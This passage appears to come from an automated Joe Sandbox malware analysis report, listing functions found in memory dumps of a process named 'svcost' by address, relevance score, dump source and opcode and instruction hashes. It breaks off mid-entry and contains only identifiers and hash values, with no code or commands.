                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 0606affb898c29cbf978545f5cca2f3c0968a713936cfdbb8c349944a65e04a8
                                                                                                • Instruction ID: 8a8b85465740ba69401eed5d6fa8edcf85c1e7356d82c7b55780d8a88d32c176
                                                                                                • Opcode Fuzzy Hash: 0606affb898c29cbf978545f5cca2f3c0968a713936cfdbb8c349944a65e04a8
                                                                                                • Instruction Fuzzy Hash: 9FE04F7095A20C9FDB40EBB99559B9DBBB8EB45301F1051B99808A3350DA305A558B45
                                                                                                Function 00C25C69 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 73cf871e4f82ecdda561dead9bdfb67d0947b53cee3fad6e963056329cd5e46f
                                                                                                • Instruction ID: 726c879ed721e164d886f47e5a0c9ee738446056257cc665440ae461b6ad2f78
                                                                                                • Opcode Fuzzy Hash: 73cf871e4f82ecdda561dead9bdfb67d0947b53cee3fad6e963056329cd5e46f
                                                                                                • Instruction Fuzzy Hash: A0F01234954129CFCB29CF25E854BEEB6B1FB46308F1411EAE01663A91C7784E84DF14
                                                                                                Function 04326C55 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: bba8a7fc40be7213be1179d60f9281fa378e67b3d3ecde7e09fedc98b035402a
                                                                                                • Instruction ID: 2328e33092837a95fab5e590fd92766fc7d3af6085489abb55c8e7a1bd470752
                                                                                                • Opcode Fuzzy Hash: bba8a7fc40be7213be1179d60f9281fa378e67b3d3ecde7e09fedc98b035402a
                                                                                                • Instruction Fuzzy Hash: 6FF0A574A16219CBEB55EF24DC94F9DB7B5FB89310F1082AAE80DA3798DB305D858F10
                                                                                                Function 043264B8 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 1bb822eea1f6758647a174474f201450af8d078d12c46b06e009618a6141bcbb
                                                                                                • Instruction ID: f2731fee41c865679ad88342dbfc28b529b5b7540dbb818f2bb4a19664151408
                                                                                                • Opcode Fuzzy Hash: 1bb822eea1f6758647a174474f201450af8d078d12c46b06e009618a6141bcbb
                                                                                                • Instruction Fuzzy Hash: C5F03974A14158DFCB10DF54E99579DBBB2FF4A310F1054A9E106A3740CB346D848F01
                                                                                                Function 00C42F28 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: :
                                                                                                • API String ID: 0-3157689729
                                                                                                • Opcode ID: 9918a8345ad55222c6f98cc916d62d8d39897e60be5cd5d2e4c62ec6cc02aa03
                                                                                                • Instruction ID: 9c99172d522195d2b1c022a60f9713883ff0c49fabafb134c7f56080228a2257
                                                                                                • Opcode Fuzzy Hash: 9918a8345ad55222c6f98cc916d62d8d39897e60be5cd5d2e4c62ec6cc02aa03
                                                                                                • Instruction Fuzzy Hash: 02E0127194120CDBD701EBF19915A9E77A8EF06304F5041B5E51897150DE325A049B92
                                                                                                Function 0031CA88 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,z=
                                                                                                • API String ID: 0-1135524859
                                                                                                • Opcode ID: 94fae8a1e3a8491cf8c69e70cc7c4da898eac2f82e1a56eeb160e9a152e89917
                                                                                                • Instruction ID: cd6ec9ab7f49893ce495ffca4cfa90d44989db6add50533b1ba8e683b746fff8
                                                                                                • Opcode Fuzzy Hash: 94fae8a1e3a8491cf8c69e70cc7c4da898eac2f82e1a56eeb160e9a152e89917
                                                                                                • Instruction Fuzzy Hash: 43E0E271905208AFD702EBB4A918A9EBBA9EB0A345F1040A6D51993260EE325A149B92
                                                                                                Function 0432695A Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 33a3e0846d6a40a027551c5ed96e50070c8a02ccbdcad0813bb4d16ce706eb90
                                                                                                • Instruction ID: 4f2dc36d268b5099e228f1c1fa8d713ed64b586b8d5f1981d52f4b2d3c237401
                                                                                                • Opcode Fuzzy Hash: 33a3e0846d6a40a027551c5ed96e50070c8a02ccbdcad0813bb4d16ce706eb90
                                                                                                • Instruction Fuzzy Hash: 6EE06530A0151ACFDB20DF24E899BACB7B5EF8A322F2040A9900AA7650DB305D90DF20
                                                                                                Function 00C47B0A Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: \
                                                                                                • API String ID: 0-2967466578
                                                                                                • Opcode ID: 673edfa74dcc64cf6fd7e2f0ab470c17339ac07f6d62fff393838dadeadd5b88
                                                                                                • Instruction ID: 0140473cb43798f1eff732594a76f024c935874b73b50d5c3a2b69b0e6ed77c8
                                                                                                • Opcode Fuzzy Hash: 673edfa74dcc64cf6fd7e2f0ab470c17339ac07f6d62fff393838dadeadd5b88
                                                                                                • Instruction Fuzzy Hash: 99E07E74915219CBDF21DF51C988BEEBBB4FB19315F24A09A880973290C3B40A88EF19
                                                                                                Function 04326D34 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: f7edfb00361b9a68dcc7e897dd70c7d24e6959ca6ef3ce8960baabfd359837d6
                                                                                                • Instruction ID: 2956ef7ed2c407a5be4ed1f8a724faa86c67898a28b73e314dbf52afb42e46ef
                                                                                                • Opcode Fuzzy Hash: f7edfb00361b9a68dcc7e897dd70c7d24e6959ca6ef3ce8960baabfd359837d6
                                                                                                • Instruction Fuzzy Hash: 78E01A34A00159CFDB55EF61D894B9DB7B1EF4A300F10849A950AB7290CA705D84CF21
                                                                                                Function 04326D8A Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 8dc56f9540faf7508957f876e087ac2abf4338f53cbbf0a4415aac29a7ffd629
                                                                                                • Instruction ID: 06efaf45cadb56f72c4cf2b4c38a2fc45794254b82f0ecffcab066276509de23
                                                                                                • Opcode Fuzzy Hash: 8dc56f9540faf7508957f876e087ac2abf4338f53cbbf0a4415aac29a7ffd629
                                                                                                • Instruction Fuzzy Hash: 5FE01A38A00229CBCB61EF64D894BED7771EB8A311F1081E9900967B94DB701D899F00
                                                                                                Function 04326F33 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 70d6ff64d11d3245521198e11a9802143eec3aef705cdf948b8f6b1e8396c8e8
                                                                                                • Instruction ID: 1bc78ae6120ca9448afb9dc031aff6d90634f916292d3b33c0c60e64149aabb3
                                                                                                • Opcode Fuzzy Hash: 70d6ff64d11d3245521198e11a9802143eec3aef705cdf948b8f6b1e8396c8e8
                                                                                                • Instruction Fuzzy Hash: 07E01A34A143188FCB10EF21D995B9E77B2EB86310F1000A8D50D63291CB705E41CF01
                                                                                                Function 04326F89 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: a85d357bb4953c261c6861097f5b50570568f712147976045b75759fe30033d2
                                                                                                • Instruction ID: 2e84eeab5d9dfd1a996a332542a2f322d2c18c9975aca713795634eb2ebbeaa6
                                                                                                • Opcode Fuzzy Hash: a85d357bb4953c261c6861097f5b50570568f712147976045b75759fe30033d2
                                                                                                • Instruction Fuzzy Hash: 9EE01A34A051189FDB51EF15DDA5B9D7775FB4A310F1042E9D50A63794CB301E84CF11
                                                                                                Function 0432683D Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: c1d12cc23d055db0617504ba5d51b4dde750cd8cf9a3aa629433de4cf1bd0491
                                                                                                • Instruction ID: 5790ff183ba06939913b178e69e9c64994f855fbe6901e7977bf0b3d305db55e
                                                                                                • Opcode Fuzzy Hash: c1d12cc23d055db0617504ba5d51b4dde750cd8cf9a3aa629433de4cf1bd0491
                                                                                                • Instruction Fuzzy Hash: 3BE0E570A242189FC715EB20E896B9DB671EB4A300F504199954AA3350CB302E51CF51
                                                                                                Function 04326BFF Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 26f51fc12c3fbdb0579a5a99c84c3ebaf2d8464d7392b2c392ee230b49eddef0
                                                                                                • Instruction ID: 100b1b0ec9f0a6a62c90f811a082e0c1f1ffadeec71c9d350ffce0f4cbca2e2a
                                                                                                • Opcode Fuzzy Hash: 26f51fc12c3fbdb0579a5a99c84c3ebaf2d8464d7392b2c392ee230b49eddef0
                                                                                                • Instruction Fuzzy Hash: F2E01A34A042288BC795EF15D895B9D777AEB8A311F104198D00EA32A4CB301D89CF01
                                                                                                Function 00C2997B Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: e1b7644b48532ce8eb2f4514be3ed74472cdedfccaa59346466f5bba41302bf1
                                                                                                • Instruction ID: 0198181680d217cac1a5af277cb679f36c982840c15b5436ad847ace898c1d7e
                                                                                                • Opcode Fuzzy Hash: e1b7644b48532ce8eb2f4514be3ed74472cdedfccaa59346466f5bba41302bf1
                                                                                                • Instruction Fuzzy Hash: 83E01734510108DBCF42DFC0C840ECE7B76FB49310F108104E5056B2A8C7359954DF40
                                                                                                Function 04326814 Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 72ca5c01cca989883dcda098b8de6ff256eaf16a292051c8473d1e696594b823
                                                                                                • Instruction ID: 9002c2d1f30c36dc24f48f66ef505ebba75bc75ba4bc94d866e8421893d87744
                                                                                                • Opcode Fuzzy Hash: 72ca5c01cca989883dcda098b8de6ff256eaf16a292051c8473d1e696594b823
                                                                                                • Instruction Fuzzy Hash: 9BC08C30279018CBD701AB40D8487A9322AEB89304F105019D00232A98CB341801CF10
                                                                                                Function 0432E600 Relevance: .5, Instructions: 516COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cd98adbee5a5de043c881e06fc9041ab1a80a129208663673a6de97accbaacb3
                                                                                                • Instruction ID: c67da05d7c7709f5915a915f16f7f0e645c756c7d0344b490bbd245c0b30ed72
                                                                                                • Opcode Fuzzy Hash: cd98adbee5a5de043c881e06fc9041ab1a80a129208663673a6de97accbaacb3
                                                                                                • Instruction Fuzzy Hash: EC228B30A042298FDF15DFA4D986ABEBBB6FF48710F148515E811E73A4DB34A942DF90
                                                                                                Function 0432F1D2 Relevance: .4, Instructions: 444COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: aa3a5e718499db95148435185dd01b3bdd61d6d9ce3dbfdfc49e45458e8ab8e8
                                                                                                • Instruction ID: 652127cac78d82352dbb2365baa2962450c79af356853ff07d99109eb9395e34
                                                                                                • Opcode Fuzzy Hash: aa3a5e718499db95148435185dd01b3bdd61d6d9ce3dbfdfc49e45458e8ab8e8
                                                                                                • Instruction Fuzzy Hash: 42F1FF31B106249FDB04DF68C990BADB7B6EF88310F248169E905EB391DB75ED40DB90
                                                                                                Function 00C4EAB8 Relevance: .4, Instructions: 370COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dd80809645e1e573422738bd53dfd61f599f5474774f4d115b4291000b352497
                                                                                                • Instruction ID: daf996ed237e66a4941c3f72c84c0a8c38d37d98662060eadf113362e4ba1305
                                                                                                • Opcode Fuzzy Hash: dd80809645e1e573422738bd53dfd61f599f5474774f4d115b4291000b352497
                                                                                                • Instruction Fuzzy Hash: FEF1DA34A10118DFDB08DFA4D998AADB7B2FF89301F118559E906AB3A5DF70EC42DB50
                                                                                                Function 0432F3A9 Relevance: .3, Instructions: 322COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e1bbe791172ee2045a6ceaf47621a710cc826ed973eeff727fb3c865acccceac
                                                                                                • Instruction ID: 42a9a8d2ab0f0e96a32b6327af923e6f039fdb919ed026114f4ef6b1cf3ca444
                                                                                                • Opcode Fuzzy Hash: e1bbe791172ee2045a6ceaf47621a710cc826ed973eeff727fb3c865acccceac
                                                                                                • Instruction Fuzzy Hash: 20C155357102149FDB04CFA8D984EAEB7B6EF88710F254069E902DB3A5CB75ED81DB50
                                                                                                Function 0432ADA8 Relevance: .3, Instructions: 265COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 15447e9f68977ec2b1d706cb9a0df307a316449510b124e37c7ebe7162eb8213
                                                                                                • Instruction ID: 64fc028a3c28ce45ce80a19f731d98cc5060589a96bac67527554564adf65f24
                                                                                                • Opcode Fuzzy Hash: 15447e9f68977ec2b1d706cb9a0df307a316449510b124e37c7ebe7162eb8213
                                                                                                • Instruction Fuzzy Hash: 6CA1AB31B052249FCB15DF64DA54AADBBF2FF88311F11806AE911DB291CB35ED42CBA0
                                                                                                Function 00C4EAA9 Relevance: .2, Instructions: 223COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8f491f37e4ab267821c7daa420535ce2c7f799f81da5d0f21cc2ffbe9a4e0cde
                                                                                                • Instruction ID: a2ffeffb2abc6f184db2412543c1240767a440949498d348df8aebefe8e1b0cb
                                                                                                • Opcode Fuzzy Hash: 8f491f37e4ab267821c7daa420535ce2c7f799f81da5d0f21cc2ffbe9a4e0cde
                                                                                                • Instruction Fuzzy Hash: F9A1E034A10118DFDB04EFA4D899AADB7B2FF89301F158559E805AB3A1DF70ED42DB50
                                                                                                Function 0031ECA8 Relevance: .2, Instructions: 208COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 11007e2dd691e51dac5c44424e10a71829880ec632ff232c7a3645cf240b4e9e
                                                                                                • Instruction ID: d3de2f9552a0792e6e58b1189333f00ea8c6f73e43ef9ef1f893d7f98c4b12ba
                                                                                                • Opcode Fuzzy Hash: 11007e2dd691e51dac5c44424e10a71829880ec632ff232c7a3645cf240b4e9e
                                                                                                • Instruction Fuzzy Hash: E8814B35A00614CFDB19DFA9C484A9DB7F5FF88311B1685A9E816DB360DB31ED81CB90
                                                                                                Function 00C4C8F1 Relevance: .2, Instructions: 203COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5e34af568c140915a1c634cb5f731ac9aab99d6598035ead4731c9253031167c
                                                                                                • Instruction ID: 82129b55e5823ac7f3dd65ed6098a24c7eb3e1d99b06a634014097c082de8e28
                                                                                                • Opcode Fuzzy Hash: 5e34af568c140915a1c634cb5f731ac9aab99d6598035ead4731c9253031167c
                                                                                                • Instruction Fuzzy Hash: 1EA11674E06218CFEBA4CF69D9C4BADBBF1FB49314F2480A9D019AB261D7755A84DF00
                                                                                                Function 00C4C93C Relevance: .2, Instructions: 183COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6784feb76ec5f2cb5c55c937b3eee2811bf26a5392b474c0e202aed563d1bd1a
                                                                                                • Instruction ID: f3235ac9151c6dd575f1297bf8712b0ad76650c5fd3d08a0bbd00b3634a96f4b
                                                                                                • Opcode Fuzzy Hash: 6784feb76ec5f2cb5c55c937b3eee2811bf26a5392b474c0e202aed563d1bd1a
                                                                                                • Instruction Fuzzy Hash: 61810574E06218CFEBA0CFA9D9C4BADBBF1FB49314F2080A9D019A7261D7745A84DF40
                                                                                                Function 00C4CBA1 Relevance: .2, Instructions: 180COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ab59acf35959ac4854326cb3391ecf629fae163a58c8383403a71836605a1ea9
                                                                                                • Instruction ID: 8780f204a134af2d6110ea964aec154c21e916b9e2b393d70e7a9393f4d2aa9a
                                                                                                • Opcode Fuzzy Hash: ab59acf35959ac4854326cb3391ecf629fae163a58c8383403a71836605a1ea9
                                                                                                • Instruction Fuzzy Hash: 72811574E06218CFEBA0CF69D9C4BADBBF1FB49314F2080A9D019A7261D7755A85DF00
                                                                                                Function 00C4CD2E Relevance: .2, Instructions: 180COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6b9e851ac3401d8a63497586d4fd46c713d2dee79f40112ed49f8c4043f027fc
                                                                                                • Instruction ID: cb27576bfd21f909eeb4a8d8a5020f925035fa781cd5abc2ee999461b20670d7
                                                                                                • Opcode Fuzzy Hash: 6b9e851ac3401d8a63497586d4fd46c713d2dee79f40112ed49f8c4043f027fc
                                                                                                • Instruction Fuzzy Hash: 5981F474E06218CFEBA0CFA9D9D4BADBBF1FB49314F2080A9D019A7261D7755A84DF00
                                                                                                Function 00C4CEFC Relevance: .2, Instructions: 166COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 17e517a5fbaccd6ef47fa5192b1ed3c5cdf5ea09f4fb76b7a12038185da9d8a2
                                                                                                • Instruction ID: a9f6a11ce7bfabf4ae312904a984d319086b0c15a72c658b05e142d2396b38de
                                                                                                • Opcode Fuzzy Hash: 17e517a5fbaccd6ef47fa5192b1ed3c5cdf5ea09f4fb76b7a12038185da9d8a2
                                                                                                • Instruction Fuzzy Hash: 2461FA74D06208CFDB44DFE9D584AEEBBB2FF49310F20802AD419A7261D7755946CF51
                                                                                                Function 00C4CA0E Relevance: .2, Instructions: 153COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4dbddc7408d6025559fd78d9eec0a4524e80dd34ed2dfef16fcc07cc5741a923
                                                                                                • Instruction ID: cc7a2019d58b8ecafbfaab160b17dcead86c742d2d08e4d74631fec75c3f108e
                                                                                                • Opcode Fuzzy Hash: 4dbddc7408d6025559fd78d9eec0a4524e80dd34ed2dfef16fcc07cc5741a923
                                                                                                • Instruction Fuzzy Hash: D0612574E06219CFEBA0CF69D9D4BADBBF1FB09314F2480A9D019AB261D7745A84DF00
                                                                                                Function 00C4E688 Relevance: .1, Instructions: 143COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 587c43e3975496ee67c587bbb37ad9f379f6f3ca702f39407b9847bb77ddf90c
                                                                                                • Instruction ID: 17882fdeb7886d7e4838d28f74d4b24a65ec8dd119c50eb12c924b1c5831f4fc
